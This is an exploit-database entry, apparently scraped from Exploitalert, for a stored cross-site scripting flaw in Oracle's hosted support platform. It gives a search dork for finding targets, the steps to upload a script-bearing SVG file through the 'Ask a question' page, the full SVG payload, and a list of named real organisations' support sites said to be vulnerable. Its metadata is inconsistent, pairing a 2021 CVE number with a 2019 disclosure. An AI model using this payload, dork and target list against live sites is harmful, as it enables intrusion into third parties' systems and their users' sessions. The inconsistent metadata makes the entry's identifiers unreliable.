Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-2397 | CWE-79 | Not specified | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2019-07-11 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N | 0.02192 | 0.50148 |
# [+] Title : Oracle Integrated Support Platform Service XSS Vulnerability # [+] Author (Discovered by) : Zunfix # [+] Team: TurkHackTeam # [+] Vendor: cloud.oracle.com/service-cloud # [+] Date : Jul, 10th 2019 # [+] Dork : inurl:/app/answers/list # [+] Poc : + We have to dork in search engine + We create an account on the vulnerable site [Register path: /app/utils/create_account] + We go to the Ask a question page and add and send the svg file containing the exploit code [Question page: /app/ask] + We go to the support history page and go to the question we asked from the list [History page: /app/account/questions/list] + We open the exploit svg file that we added from our question page + Exploit code running [Exploit code: <script>alert(123)</script>] # [+] Svg file source code containing exploit : <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script> alert(123) </script> </svg> # [+] Vulnerable Sites E.g : + answers.nssc.nasa.gov + help.cbp.gov + supportcenter.ieee.org + support.us.playstation.com + support.en.kodak.com + eng.faq.panasonic.com + kb.sandisk.com
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.